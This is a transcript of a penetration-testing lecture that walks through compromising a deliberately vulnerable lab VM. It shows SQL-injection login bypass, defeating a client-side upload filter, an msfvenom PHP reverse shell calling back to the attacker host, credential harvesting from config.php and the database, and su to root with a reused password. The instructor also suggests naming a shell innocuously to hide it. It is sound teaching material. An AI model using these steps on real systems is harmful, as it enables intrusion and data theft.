And we're going to also import our OVA file. So it's a pretty straightforward import appliance, go to wherever you've downloaded your OVA file. It's called infosec3.ova. Click on next. You can change the name to BTRisk, as I described in one of the other videos. It's entirely up to you. The naming is entirely up to you. I really, really don't care. This is a standard import. The name that you give objects, in this case, really doesn't matter. What matters is the settings. So let's take a look at it. And this is a competency-based activity. And you do need to write a report for this competency. Okay? I did check the gradebook elements are all in place. I'm sorry, I didn't hear that. Say again. Sorry?
Your screen is not shared.
It should be. Can anybody else not see my screen?
No, I think I can see your screen.
I think you might be having problems, whoever that was, because I'm on my side. It looks like I'm sharing the screen and got my mic turned on. Is anybody else having a problem seeing my screen?
No, I can see your screen.
Okay. Whoever that was, again, I am recording this presentation. Maybe jump out of the meeting and jump back in and see if you can't see my screen. Okay? But if you don't see something, like I don't mean to dismiss your concerns. If you have problems, please always let me know and I'm happy to address them. But this time it might be on your side rather than on my side. But so log out and log back into this meeting and see if that doesn't solve the problem. Okay? So, anybody else having problems? Let's move on.
Hi, Stephen.
Yes.
I have a question. Yeah. Could you please tell us more about the midterm exam?
I was going to do that later, but I can talk about the midterm exam right now. No, I can do it right now. My memory isn't always the best, so it's probably better to do it right now. The midterm exam is like any other activity I have. I'm not going to give you the instructions. I am just going to give you a link to an OVA file. You will download and import that OVA file into VirtualBox. And once you have it up and running, you will say, Stephen, I've got this done, and then you will show me, and I will give you the mark for that. And then you will start doing your attack. There will be a list of grade items in a grade book that you will see what I'm looking for. Once you've achieved those, you will get marks. Things like importing the VM and doing a network scan, those are only worth like 1 or 2 marks. They're not worth very much relative to the other items, but you will still get grades for those. So once you've imported the OVA and it's up and running and it's running properly, you'll get the mark. Once you've properly done your Nmap scan and discovered the services and maybe any other scans that you need to do, you'll get the mark. Okay? And then we'll just go through, for I think it's 4 or 5 different mark items. Once you achieve those and you can demonstrate those to me in your shared desktop, that's when you get the marks in the gradebook. That's what the exam is going to be like. I'm not going to tell you what things to focus on for the exam. They're going to include everything up to, there might be a little bit of the activities today, but anything that we've covered up to this point in the pen testing class is fair game. It is open book. You can use anything you want, except I don't want you collaborating with each other. You can Google research. You can go over the old notes. It's like an open book exam. I just don't want you talking to each other. Does that answer your question?
Yes, thank you.
Not a problem. Of course. Did anybody else have any other questions on the exam? Because you have to coordinate with me and show me individual actions, individual competencies for the exam, this is why I'm doing the survey. So I know where everybody is, so I can try and accommodate everybody as much as possible. The survey is very important, and I'm going to ask everybody to try and fill it out. I'm asking everybody to fill it out, and if you don't fill it out, I'm going to call you on it and say, hey, fill out the survey. Evie, did you have a question?
Yes, I do. Is it just that's the only thing we're doing, or we're going to do a multi-choice exam?
There is a multi-choice component. There is a ethics component to the exam that you're going to have to do at the beginning. Yes, thank you. This is why I wanted to do it later. But there is a quiz that you can start the exam with. Yes. Okay. Thank you, EB. I forgot about that. So you'll have to go over your content that you learned in ethics. It's a multiple choice question. There's I can't remember how many questions, but yeah, you'll be doing that first. Any other questions? Okay, let's move on. So we've imported our VM, as you can see here. Whoever had to leave and come back, can you see my desktop again?
Yes, I can. Thank
Perfect.
you.
Nope, thank you. I'm glad you let me know. I appreciate the heads up. So we've imported our VM file. As always, we verify the settings. Again, we have an invalid settings detected, but when we move our mouse on top of it, it complains about the graphics. And we've seen in the past we don't have to worry about the graphics, so we're going to leave it as is. As always, we verify our network. Looks good, looks good. Oh, promiscuous mode is deny. Always set the promiscuous mode to allow all. Okay, so as always, verify your network settings. Again, how did I do that? After my VM was imported, click on settings for the VM, check to see if there's any invalid settings. If it's the video, we can ignore it, but we do need to check the network. We only have one adapter. Adapter 2, 3, and 4 are all not enabled. All right, adapter 1 is enabled. It's on our host only network, and we want to make sure promiscuous mode is set to allow all. You should do this every time you fire up, every time you import a VM. Click on OK and start up your VM, please. As always, we watch our VM boot up, and sometimes this one boots up with a little bit of a warning. Okay? That's okay. We can accept it and or ignore it, but sometimes on this page you might see a warning or an error. As you can see, it booted up very quickly. We didn't get any clues on that other than the server name is BTRisk, BTRsys1. BTR stands for BTRisk, and it's System 1. So it's BTRisk something. All right, so really no clues here. Nothing to give us. So of course, we're going to have to do our standard attack profiles. First things first, open up a terminal. And we're going to start with a standard network scan. My network is 56, so I'm going to scan the nmap. I'm going to scan with nmap the 56 network /24. I'm going to see what I discover. And as always, I'm going to take notes. And something interesting has happened on my machine. Okay, 56.1 is the adapter of my host only network, and basically 56.1 is my Windows machine. If I go into Windows and do an IP config, you will see that 56.1 is the adapter for my host only network. So when it's hitting 56.1, it's actually hitting my machine. I'm losing people. I just lost 2 people. Oh, some are coming back. Okay. If you have done a Windows update like I did over last weekend, or maybe, yeah, it was recently I did a Windows update, you're going to see that in your nmap scan, you're starting to see a lot more traffic from Windows. This is very worrying. I don't understand why my Windows machine is now reporting a lot more, including a web server. I think this is Skype. I think this is related to Skype that got installed when I did the latest milestone. There was a milestone update to Windows, and I think that's what I'm seeing here is a bunch of crap that Microsoft installed on my computer when I did this update. So, screw you, Microsoft, first and foremost. But now we're starting to see. And This is the real world nature of hackers. This happens all the time. When hackers are doing their job, they will often discover things that companies like Microsoft do without even really telling people that they're doing it. It's very interesting. But we're not going to focus on that. This is the address we are focused on. We know 219 is us. We know that 219 is our Kali, so we can assume that 238 is our target machine. So Kali is 192.168.56.219, and this is going to be important today because we're going to set up a remote shell and we have to know our own address. Target is 192.168.56.238. All right, so we have our Kali and our target IPs. Let us, of course, at this point do a detailed scan of our target. Nmap, we know it's not going to work, so we have to sudo nmap -sv -uppercase O, and we want to target our machine. And I use the double click to copy and then the middle mouse button to paste. My password is, of course, password. And we're going to do a detailed scan. Now, we could also do a full port scan, as I say in the notes. But to be honest, at this point, we're not going to see much more than maybe SSH and a web server. This is not like some of the other examples we've done in the past. Now we're going to focus mostly on web attacks. There might be something else running, like OpenSSH, which we can take advantage of. There might be other services, but they're going to be red herrings. They're going to be things thrown at us that aren't quite so necessary. We're really going to focus on web attacks by and large going forward. We may augment that, with OpenSSH, just like we did when we were cracking the SSH keys with Marlinspike. Not with Marlinspike, but with the second InfoSec activity that we did just before.
Medusa.
Pardon? Not Medusa.
Medusa.
Yeah, we didn't use Medusa, but thank you. First of all, thanks for contributing. I appreciate it. But what I was trying to say was the InfoSec 2 activity that we did just before midterms, where we were using the SSH keys and trying to crack them. Okay? So we have a web server. We've talked about this before. When we have a web server, we want to do a scan of the web server site itself. We want to enumerate what we discover on that web server. And we have two tools, Derb and Nikto. Okay, so let's take a look at Derb first. Derb, I like this. I really like this Z shell environment. It gives us a prompt that we can use going forward. I really got to say I like that. I'm really liking the Z shell in this version of Kali. So we're going to tell it, Derb, to scan our network. We kind of lost that, so we're going to let it run here. So we're going to say Derb http:// and your target IP. And after Derb is run, we want to do a Nikto scan as well with the -h for the host, and then again, your target IP. Your target IP, of course, is going to be different than my target IP. Of course it is. All right, your environment is different. It is unlikely that you are up to IP address 238 in your pool of DHCP available IP addresses. Okay, so those are the things that we're going to start with. Of course, we can't know our target IP without an Nmap scan. Alrighty, so once we get our target IP, we Derb and Nikto it. And Derb gave us this result here, which gives us some interesting data, but let's take a look at Nikto as well. Nikto-H, and again, it is 238, the address that I want to attack. This is called enumeration. looking for a list of whatever. In this case, we're looking for a list of artifacts. In this case, they are website artifacts. We're trying to find out what is running on this website. There are other tools that will do this as well. In this class, I use Derb and Nikto, and I always run both of them because they use different word lists, and they discover different things. Often they'll discover the same thing. When we ran Derb and Nikto against the Metasploitable, they both found phpMyAdmin, for example. But when we run them other times in other places, they sometimes find different results. So I always run both just to make sure. Okay? When you get into industry, you may find other word lists to use. You may find other web enumeration tools to use. For what we do in this class, these are fine. Okay? Let's take a look at the results. First, when I ran Derb, it found a directory called uploads. Well, that's really, really interesting. So there's a directory called uploads. That's really, really important. I'm going to take note of that. There's a directory called uploads. There's also something called config as well, but we don't see that here. We see, where is it now? We see the uploads. And in Nikto, we see a config.php. Now we can take a look at that, but we're really not going to get anything from it. But we're going to keep that in mind. There was something called config.php. We're not going to be able to do anything with that, not yet. We will in a while. And then third, there's a login.php. Okay, now please note, config and login were found with Nikto, and the uploads directory was not. I don't see my uploads directory here. It tells me that there's no CGI, so that's handy. Keeps us from doing that, but it found the assets, and it found the uploads directory with Derb. And right here is a great reason why I use both. Why I use Nikto and Derb together, because each one will find different assets. So let's take a look at this. Now we can open up our browser and navigate to that website, or we can simply right-click on the Derb result list. We can right-click and open any of the links that it found. Okay? And I'm just going to move this off to the side so we can see it a little bit better. Now, as I mentioned, this is a Turkish website. If you click on the content, you're going to see a bunch of Turkish content. Okay? Without any real help. Now you can go through and read it. I've translated this using Google Translate. I can't remember what it talks about, but it's all Turkish content. It doesn't matter, because when we attack a website, we're not talking about the language that is facing the world. We're going to focus on the language that controls the website. The HTML, any PHP, any JavaScript. Those are the languages we care about. We don't care about the spoken language that sits in front of all of that. Okay? Now, when we went through, one of the things we discovered was an uploads. Or let's take a look at login first. Login.php was one of the sites that we found, was one of the links that we found. Another one was a directory called uploads. And there we go. So here's that index of uploads. There's nothing in it yet. There's also a login page. Okay, now anytime we see a login page, the first thing we want to try is our injection. Oh, Jesus. Okay, one sec here. All right. Well, I'm sorry that you can see that. I didn't want you to see that. We're always going to try the tick or 1 is equal to 1 injection. And then, of course, we're going to try the hash. We never know, but we're going to try that. Okay? And then we're going to click on submit. Now, if you don't know what this is, GIRIS, you can always go to Google Translate, right? And we can try GIRIS, all right? It detects it as the Turkish word for login. So this makes sense to us. This kind of makes sense. If you ever come across something, Google Translate can actually be your friend. And now when I click on GIRIS, it complains. I have no idea what this is saying. Let's see if I can figure out what this is saying. Control C, all right, Control V. Trying wrong user information. So it's not happy with my user information. Okay, let's take a look. Let's try that again though. When I click on submit, it's almost instantaneous. You don't see it trying to connect. And this is a clue. It doesn't actually go to the server and come back and say, hey, there's something wrong. It does it right away, almost like it's doing it inside the browser. So that's what we want to do. We want to check out what language that runs in the browser, and that's JavaScript. If you right-click anywhere and take a look at the page source, we're looking for JavaScript code that could explain what's going on. When we go down to the bottom of the page, we see our JavaScript, okay? And even though it's all missing, I'm sorry, not missing, all of the text that comes is in Turkish, we can see it's looking for an @ symbol, and it's also looking for something called BTRisk.com. Now, BTRisk kind of makes sense when we take a look at this, BTRsys1, BTRisk. Kind of makes sense. So it's looking for an @ symbol and BTRisk. It's almost like it's looking for an email address. Fine, let's give it an email address. And that's what you see here. Unfortunately, I've already done it on this machine, and I thought I had cleared it off, but I guess I hadn't. So that becomes my injection, my standard SQL injection, and give JavaScript the string that it's looking for. Let's try that and see what happens. And we're in. And right here is one of the more important aspects of today's lecture. When you are information security professionals going forward, always tell your developers, your website developers, or your team if you're part of that team, never trust anything from the browser because we can manipulate the browser data too easily. They didn't verify on the client side that they supplied a correct username. They trusted the JavaScript on the client. They didn't validate. They trusted the browser to ensure that they supplied the correct type of credentials. And because they trusted the browser, they opened themselves up. Now, there is a little bit of security through obscurity here. How do you do an SQL injection? Well, you do that. Well, let's just add an email and check it. Oh, that'll solve our problem. No, okay? And this is why we teach pen testing, so that you can see and try and figure an end run around it. But most importantly, never trust anything from the browser. Validate everything on the server, in the web server, in the PHP code, or whatever it is you're using. Okay? Because now we're in. And now it looks like browser and Gondor. Well, what does Gondor mean? Let's take a look at that. Gondor. Gondor, English to English. We know it's not English. We know it is Turkish. Gondor. Did I misspell that? Gondor. Gonder. Sorry. Gondor means send, all right, or possibly upload, okay? If you look at it, other places will tell you that Gondor can also mean upload. But that makes sense. Browse, select a file, and then Gondor, or allow them to upload, which jives with our uploads directory. Let's see if we can upload something. So we're going to browse, and it says it supports JPEG and PNG. Let's see if it can upload something else. All right, I'm going to go all files, and I'm going to upload something. Now this is where we start testing. Now I don't have any pictures, but let's see what happens if I start. So this is my, I should have done separate tabs. I should have done one tab for my network scan. I should have done a tab for my web scans. So network scans. I should have done another tab for web scans. And then I should do a third tab. And this is, well, I'm not sure what I'm going to call this one yet. So let's call initial attack or whatever. It doesn't really matter. But like always, I am going to make a directory called BTRisk, because that's what this site is called. I'm going to change into that directory. Perfect. And I'm going to start making some files. I'm just going to use the touch command to make a test.jpg, because we know they're looking for JPEG files. I'm also going to touch test.txt, so I can start uploading something else. And this is the important part. This is a deliverable. If I can put something on this server that I can exploit, like a remote shell tool, then I can take control of this server. And that's the goal. And ladies and gentlemen, this has been a significant threat for websites for a very long time. One of the sites that I manage with my fly fishing club, the only site that our fly fishing club has, but it's one of the sites that I help on, is the site for my fly fishing club, and we were running Joomla. And there was a vulnerability for Joomla where people could upload a remote shell and then manage your website remotely. It was a huge problem, and it took me a full day or two to clean up all the mess that this attacker made on my website. And it wasn't because, I didn't do something. A vulnerability was discovered in Joomla, and it spread so quickly that people were exploiting it before people like me could even update our website. This is a known and ongoing problem, and this is something we're going to focus on a lot. Launching a remote shell to take over a website. That's what we're going to do. To that end, I'm going to try and upload my payload to the uploads directory. I'm going to do that by taking advantage of this. So I'm going to browse. I'm going to say, let's take a look at JPEGs. Go to your home directory, go into the directory that you made, and I'm going to upload my test.jpg. Gondor and Doyas, I don't even know what that means. That probably means success, but let's check. File uploaded. It doesn't mean success, it means file uploaded. Perfect. It's telling me I was able to upload my file. When I reload, there it is. Now it's an empty JPEG, it's nothing in it, but I can upload files. Let's see if I can upload something other than an image. Hit the back button, browse, and rather than look for a JPEG, I'm going to go for all files. I'm going to try uploading my text file and click on Gondor. And again, right away it warns me. It doesn't go to the server and say something. We've already seen it use JavaScript in the past. We've already seen it use JavaScript and not do it very well. It says only JPEG PNG seem to be allowed. I'm not sure what that says, but that looks like it's telling me only use JPEG and PNG. You can only upload JPEG PNG files. Perfect. That makes sense. Okay. But again, it looks like JavaScript. Let's see if we can't get around that JavaScript. Right click on the submit button, on the Gondor button. Right click and inspect element. Just like we did with hack this site and inspecting elements, we're going to do the same thing here. I'm going to separate this. You don't have to separate it, but I want to give you, I have my display set up really weird so it broadcasts better online. So I separate my two windows. Again, how did I do that? When you first do it, it's docked to the bottom. There's a little 3-button ellipse. When you click on that, you can select separate window. And then you have two different windows. And I don't care what you do, it's entirely up to you. But this is the important bit right here. Here is my submit button here. Input type equals button. So it's not a submit button. Its value equals to Gondor. And I wish I could zoom in. I'm sorry, you're going to have to zoom in on my screen. Let me put this in the middle so it's a little easier to see. So zoom in and you can see my text. All right. Input type equals button. So it's not a submit button. That's important. Value equals Gondor. So we know we've got the right object. And it has an on-click event where it's calling a getFile function. There's a script tag again, and if we take a look at that script tag and just click inside, we see that we have a getFile function that checks for JPEG PNG files, and if it works, it submits the form. Otherwise, it throws that warning. Now, I know that's difficult to see, but you should see it on your side as well. Basically, our button calls this function. Now, we could change this function. We could go through and change the JavaScript, but forget it. All right? Again, they're trusting the browser to submit the information properly. We can just change this from a button and an on-click event. We can change it to a submit. So I'm changing the input type to submit, and I'm just going to delete the on-click event. All right? I'm going to delete all of that. So that's what I did. Again, what did I do? When I right-click and inspect element, I see that my button, that's not what I want. When I click on it, my button is actually not a submit button, but a regular button with a JavaScript on-click event. So I could go in, I could take a look at the JavaScript. It's down here. I can double click on it and I can modify the JavaScript to allow me to upload the file that I want to use. But it's even easier to do than that. Rather than modifying the JavaScript, I'm just going to go up here, change my input type equals button to input type equals submit. So it doesn't need to call JavaScript. It will still call the on-click event because it's part of the button's attributes. But I can change the on-click. I can just delete all of that. And again, I delete it by double-clicking and either backspacing or deleting the text. So now it's gone from a JavaScript-driven on-click event button to a simple submit. So it shouldn't check my file type at all. All right? I click away, and it changes. It just says input type equals submit, value equals Gondor. Even if you want, you can change Gondor to upload. If you want to change it, you can even change that if you want. I don't require it, but by doing that, we see that our button has changed. And now, when I click on upload, it says it succeeded. And when I refresh the uploads, there is my text file. Perfect. I can upload something other than expected. And again, they didn't validate on the server. They validated on the browser that the user was following the rules. But because they didn't check on the server, we can now upload whatever we want. Are there any questions? Okay. Next thing we want to do is actually create a payload. At this point, you know what? I haven't even looked at my notes. I don't think I'm missing anything. What's this? No, I don't need that anymore. if you take a look at the lecture notes from today's class, and you'll see why shortly, this is a rather complicated command. But let's revisit what we're doing here. This is actually a good point to revisit what we're doing. This is our attack profile right here. As always, we're running Kali over the host-only network to attack our BTRisk server. One important thing though, we now know that we can upload files to BTRisk. We're going to create a file using tools in the Metasploit framework to create a payload that we can then use to talk to from within the Metasploit framework in Kali. But we have to understand, this is our target address, this is our local host address. We have to understand that, and we're going over our host-only network. And when we do that, we're going to use the msf venom command. And you're going to have to substitute your addresses in this command here. We're going to use msf venom. We're going to create a payload. The payload is a PHP-based one. We've seen examples that is PHP. We're going to do a reverse TCP interpreter shell. We have to specify a local host and a local port. I suggest, I don't suggest, you have to use your Kali address as your local host. You can use any port you want. I recommend 4444. We use that a lot in this class. We might as well start now using port 4444. Okay? And then there's some extra arguments. And then we redirect the results to a file. You can call the file whatever you want. I'm going to call it shell.php. If I was attacking in the real world, I would not call it shell.php. I would call it something innocent looking, like image library.php. If you call something image library like .php, developers are going to go, oh, that must be something for the website. Sysadmins are going to have no idea what that is. All right? Calling it something innocent looking is part of the process of hiding it. But we're going to be open. We're going to assume that we're not doing a red team attack, but we're doing a security audit. So we're going to call it something reasonable like shell.php. Okay, so let's try that and see what we get. I'm going to keep it here because I always mistype this. So the command is msf venom, all right, -p for payload, and it's php/meterper_reverse. And I don't think tab works on this. No, I don't think tab works. TCP. So you have to type that in properly. You can probably copy and paste from my lecture notes. But it's interpreter reverse TCP, and we have to specify some arguments. One is lhost is equal to the Kali address, which I kept right here. My Kali is 219. All right. L port is whatever you want it to set it to. I'm going to set it to 4444. All right. -f is for the format, and it's going to be raw. And we redirect the results to a file. Again, we're in our BTRisk directory where we created our test JPEG and test text, and we're going to call this shell.php. It does need to be a PHP file for the web server to run as a PHP script. So we have to call it .php, which is why we tested and uploaded something other than an image file. Hit that. It does take a while. It will complain about some mild warnings. You didn't do this, you didn't do that, but we don't have to worry about that. It just assumed a platform, no architecture, but there really is no architecture necessary. No encoding, so it's doing it in a raw output. That's fine. We don't need to encrypt it. But sometimes when you're looking at successful attacks, they will actually encrypt the payload using, base64 encoding or something like that. So not encrypting, encoding. They will obfuscate it by using base64 encoding, like you will see Next semester, when we start cracking malware, start taking a look at viruses, you will start seeing some encoding examples then. Not going to focus on it now, but it's one of the tricks that hackers use is that they'll encode it so you don't actually know what's going on, but you can very easily decode it as well. Okay? Perfect. So now when I do an ls, I've got my shell.php. Now there's one little quirk that I mentioned in the documents. This file has an error in it. I think they do that on purpose to keep script kiddies honest, but the first thing you have to do is clean up shell.php. You can use your text editor, you can open it up here, but it takes a long time for whatever reason. So I'm just going to use nano. So now that I have my file created, I'm going to say nano shell.php. Because right here, you can see it, there's a comment. The first two characters need to be deleted. Again, how did I do that? After I created my payload, I need to clean it up. So I do that with the nano command, and the payload is of course called shell.php. And I just need to delete those two first characters. So it no longer comments out my code. I don't know why the comment is there. It's been like that for a few years now. There are other payloads we can use, but I want you to get exposure to creating a payload and then using the payload in the Metasploit framework. And that's why we're using this today. So I've deleted the first two characters, Control O to save, Control X to exit. Okay? Now you can also use vi to do this as well. I know you guys know how to use vi, but as you can see, vi well, it put me at the end of the line, so I'm not even going to bother with vi. But you can also use vi to delete that first line as well. But I actually find that nano gives you this syntactic highlighting, which I really like. I don't care, you need to delete those first two characters. Okay? And now you've got it done. You've got your payload ready to go. Go back to your browser and try again. Hit the back button, and because I changed the text to upload, you can tell that it hasn't reloaded the page, but let's make sure. Inspect element, and it's still, my submit button still looks like a submit, and it doesn't call the on-click event. So my form is still good, perfect. Let's browse. It's still looking for all files. There's my shell code. Select, open, upload. It looks like it's successful. When I reload this page, my shell code is in place. Okay? Any questions? This is critical. If you can upload a shellcode exploit to your target machine, you can take over your target machine. Now, I'm not going to ask you to don't click on the link just yet. When you click on the link, it's nothing. It doesn't show anything. It just loads the page, and that's bad. And it completes loading the page as well, because there's two parts to these shellcode attacks. All right. The first is the payload, but the second is a listener on the machine. And this is why we used the lhost parameter. I've put my payload on BTRisk, but I told it where to find Kali. Now I have to launch what we call a listener on Kali. We're going to use the Metasploit framework for our listener. In future classes, we're going to use a tool called ncat, or the nc command, to act as a listener. There's different ways of doing this. There's always different ways of doing this. But what we're going to do is we're going to install something to listen on the machine, and then when we deploy and activate our payload, the listener starts taking requests. So anything we type here goes back here, and then they communicate back and forth. They create their own remote shell connection. We put that on BTRisk, and we told it where to find Kali. Now we have to tell Kali to start the listener. And we do that at the top of page 6 by launching MSF console, specifying the exploit multi-handler, which becomes our listener, setting the payload, specifying the parameters again, and then running it. All right? Once we have it running, that is when we load our remote shell. So let's do that now together. Okay? So now that I have it in place, don't click on it. Don't click on it yet. Start your listener in Kali. All right? So that's what we're going to call this. We're just going to call this listener. Now you know what? It doesn't matter. I'm being silly now. Okay. So MSF console. We're going to start our MSF console on this environment. And believe it or not, ladies and gentlemen, we're within like 5 minutes of having this done. Okay, so we're going to use an exploit tab multi-tab handler. Tab is your friend. All right, show options. All right, there is no payload set. We're going to have to set a payload before we do anything else. So we're going to set the payload to the PHP /METER PRETER reverse TCP, which is exactly the same payload we set in MSF Venom. Okay, we need to set an L host. Set L host singular to your Kali. Oh, sorry. I pasted the wrong thing, so I'm just going to do it again. I tried pasting my L host because I thought I still had it in memory, but I had highlighted something else. So that's on me. Don't worry about that. So use exploit multi-handler. All right. Set my payload to PHP /METER PRETER reverse. Oh, it found it. So when we're inside of Metasploit framework, the tab will work. So keep that in mind. Show options. And I need to set the L host to my Kali address. Or you can type it in. Show options. It's already set the correct L port. Now I have setting the L port in the documentation, but because we did the show options and it shows us that the L port is already set, we don't have to worry about it. Now we just simply run our listener. Okay? You can run the listener, and now it's listening on this port. Now that your listener is running, you can go back to your browser and launch your remote shell. And watch what happens. I have my shell listener running here. I have my browser here. When I click on my payload, watch what happens over here. It starts a session. Also note, in your browser, you see that little icon moving back and forth? It's loading the page. So it's trying to load the page, and it's just sitting there and sitting there and sitting there because now we have a shell running. Who am I? I don't understand that. Okay, that's fine. Let's start a shell. Who am I? Ah, perfect. Now this shell isn't very good. We've started a shell. We've got access into Linux here, but we need to do a little bit more. So we're going to use a slightly better shell or better interpreter environment. If you take a look at the bottom of page 6, there's actually a link to Content Online. And when you open this up, it actually takes you to a list of commands that you can use to spawn better shells. All right. Sometimes when you're using things like SQL to manipulate databases during an attack, once you spawn a crappy shell, and this is a crappy shell, like let's be honest here. When we take a look at this, ls, ls etc. I mean, this is not a nice looking shell. All right. You don't have to do that stuff, but this is a shell of very limited functionality. And if I tried launching MySQL terminal client, it wouldn't work. So we need a better shell. I've given you a link to shells that you can try. We're going to use the Python shell because I know you guys did some Pythons last year. And this is the command we're going to use, Python-C, which says execute this command. And the command we're going to execute is to import the pty module. And then with pty, spawn a better shell, bin bash. So that's what we're going to do. We're going to say, hey, you know what? Spawn me a better shell. Let's try that. First off, let's try bin bash and see what we get. It doesn't really give me anything. All right. So we're going to say, okay, let's do Python. Python-C, single tick, import pty, semicolon, pty.spawn. And now I would normally do single ticks, but I'm already inside with a single tick, so I'm going to have to use a double tick here. Bin bash. Closing ticks, closing bracket, closing single tick, enter, and now my prompt looks a lot better. It's still not perfect, but it looks a lot better. It looks like a shell that we are used to. Okay? Do you have to do this? Not always. But when you're going to use a tool like MySQL, you have to do something like this. You have to have a better shell, or it's simply not going to work. That's why I gave you this list of shells to use, because some will work, some won't. Sometimes Python will be installed, sometimes it won't. Perl is usually installed. You can always try using the os.system because this is a simple shell executable. Excuse me, I apologize. So all of these are available in different environments. Try them. I always start with Python. And Python so far has worked very well for me in most cases. Okay? Nevertheless, I'm in a directory called uploads. Of course I am, because that's where I uploaded my payload. Let's see what else is in here. If you recall, in our initial analysis, our initial web enumeration, we found something called config.php that was in the document root. It was visible to the world. Now, if I go to my browser and try and look at that config file, there's nothing there. Even when I take a look at the source, there's nothing there. But it loaded. It didn't throw a 404 error. If it had been missing, if I try loading something like that, it throws a 404 error. When I type in config, however, it actually finds the file. It just doesn't display anything. So I know in the document root of this server, there is a file called config. So I'm in uploads, so let's go one directory up and do an ls. And there is my config.php. Perfect. Let's take a look at that config. And tab doesn't work. All right? You're in a hack environment. Things like tab aren't going to work. Live with it and move on. Config.php. So we're going to have to type it properly. And right away, we see the content of that config file, including the MySQL connection information. It connects localhost. That looks like a database name, but it has a username root and a password named tool. And that is horrifying. Never, ever, ever on a web server connect to the database as root. But this is why we always hide our config information, because now I know that there's a database probably called Denemy that has a username root and a password named Tor. This is the standard MySQL connection protocol, syntax, not protocol, syntax. This is the correct MySQL I_connect syntax where you have host, user, pass, and database. Now we have this, and now this is why we set up a better shell. We can launch mysql -u for the user, root, and then say prompt me for the password. MySQL -u for the username. We're going to connect as root because right now we're www data. That doesn't help me. So I'm going to connect as root and I'm going to say prompt me for the password. And it says give me your password, and we know the password is Tor, T-O-O-R. And another indication that you're in a hacked shell. Normally you wouldn't have the password displayed back, but because we're in Python and a shell emulation, it doesn't work the way you expect it to. But that's okay. We're hacking. We can accept inconsistencies. Perfect. Now, and most importantly, I'm in MySQL as root, which is, of course, horrifying. I could destroy the database if I wanted to, but that's not what I'm going to do. First thing, show databases. There is my Denemy database, so that makes sense. The thing I want to do is use Denemy, semicolon. And it says you are now using the database Denemy. Okay? Show tables. This is something we couldn't do when we were doing our SQL injection. We can do it here because we're not doing an SQL injection. This is an SQL utility. We are logged in as the administrator to the database, and we can use the tool as regular. And there's a table called users. Great. Select star from user. And we've got 2 entries. And we can go and check each of these columns. All right. I'm not going to bother. That looks like the username right there. Those kind of look, remember we were looking for usernames when we were logging in? Akeya at BTRisk.com, CMDDIR. So we can assume that those are users. That means parola, that actually might be a password. Let's verify. We're going to go back to our browser. We're going to go back to Google Translate. Parola is password. Parola. I don't know how to say that. All right. So what's this word then? Copy, paste, username. Perfect. So that's username, that's password. You know what? This would probably allow me to log into the site regularly. Copy that. Oh no. Damn it. Don't use Control C. I just wrecked my whole attack because I used Control C. Never use Control C. Always think. So shell Python -c tick import pty semicolon pty dot spawn open bracket open double quotes bin bayon. Now I'm flustered and I'm screwing up. So calm down. Perfect. PS-EAF. Yeah, you see my shell is still running here, so can I bring that forward though? I don't think I can. So my MySQL is still running, so I'm going to have to start another MySQL session, but that's fine. MySQL -u root -p TOOR show databases use Denemy. Don't use the Control C. Show tables. Select star from user. And now what we want to do is we want to try, and I probably shouldn't do this, right click, copy selection. We're going to go back to our browser and we're going to try. We're going to try logging in. So let's open up a new page. But this time we're going to do the login. .php. We're going to try logging in again. We're going to make that our username. And I'm just playing now. I should really focus on what I wanted to do for today. All right, and we're going to try this password here. Blast, I did it again. And log in. And I'm in. And I'm in as whoever. Now I broke my system again, but that's okay. I wanted to show you that this is really a database-driven site, and these are real usernames and passwords. And I gotta stop. I've got to stop. Anyway, doesn't matter what I say, it's going to end. At this point, we can exit out of. I'm going to recreate this. Sorry. I did that a couple of times now. So we should all be at this point, and I did this on purpose. Not that we have to, but I wanted to show you this. \Q to quit. That exits MySQL. Okay, we're still in this remote environment, and that's okay. All right, at this point, it's still okay because I want to check now and see if these two people are real users in the system. Any real user in the system is going to have a directory in the home, and there isn't. There seems to be somebody called troll. That's interesting. Fine, let's take a look at the etc password file, because that's another place to find user information. And there doesn't seem, there's a blog, that doesn't help me much. There's no ILIA or IKEA or CDMIR. I don't see their names here. Okay, so why is that important? Well, it's really important because these seem to be created for the application and they use the same password. We know that parola is password and they use the same password. And we've talked about this. People are lazy and they reuse the same password over and over again. Some sysadmin probably set this up and reused his or her password over and over again. Let's see if we can take advantage of that. Okay, so we're going to try the sudo command. With sudo, you can execute a command as root. The command we are going to execute is the su dash. We're going to say, hey, make me root on this system. And it's going to ask for a password. Let's try that password. Now, that's right, we're logged in as www.data. That's not going to like that. So let's try that password here. Nope, it didn't like that. All right, and again, I lost my shell. By the way, this is common. I usually don't do this in front of students, but this is very common when you're hacking. You drop your shell, you recreate your shell. You drop your shell, you recreate your shell. So the sudo command didn't work. Let's just try the su command. And now it wants a password. Let's try that password again. ASD123 and then star, which displays it a little weird in our shell. Oh, that worked. You are root. Cat etc shadow. And I have successfully become root in the system. And just like in the past, I can start cracking those hashes if I wanted to. But this is the important thing. Who am I? You have successfully logged in as as root. And that's the goal of this attack. Okay? Let's review. Any questions? Okay, let's review. Initially, I did my nmap scan. I didn't see many services a web server is running. Okay, let's take advantage of that. We did a web scan. It should have been on a separate tab, but I failed to do that. But I'd like you to use a separate tab, please. And it gave me some website artifacts. It told me that there's a config.php. It told me that there's a login.php. And it also told me that there's an uploads.php. There's also indicate of JavaScript as well, but that's normal. But that JavaScript turned out to be very, very relevant. I was able to log in by using a standard SQL injection, but the SQL injection needed a little bit of a modification because it was JavaScript looking for a specific string. It was looking for the @ symbol, and it was looking for the BTRisk domain. This makes sense because the users in the database all have @btrisk.com as part of their username for the application. So it makes sense, but it was done on the JavaScript side. When I added that, it let me log in with those credentials. Once I was in, I found that there was a file upload ability. When I took a look at the JavaScript, I realized that it was an input type equals button and it had an on-click event to call a function. And then this function, again, was JavaScript to ensure that the extension was either a GIF or a JPEG. Rather than fix the JavaScript, and we could have added exceptions to include a .php so we could upload a PHP file. It's an even easier hack than that. Change it from input type equals button to input type equals submit. Then it doesn't need JavaScript, all right? But it'll still do that on-click event, so we need to delete the on-click and the function call. And if you want, you can change Gondar to submit. That's entirely up to you. So now it's an input type equals submit button. When we do that, it lets us upload other file types. But we have to select all files, and then we can upload our shell. Now that we've hacked it, we go into our environment and we create a shell. Now you can do that in a separate tab as well. But way up here, I created a shell and then I fixed the shell by cleaning it up. I had to go in and delete the first 2 characters. I explained that in the notes. You can use any text editor you want, I don't care. Once my shell was done, I was able to upload it and post it. And once I had uploaded it, you could then find it in the directory. Now before you load it, you have to launch your listener. And that's what I did here. I launched the MSF console because the MSF Venom uses the MSF console for a lot of its activities. I used the exact same payload, I used 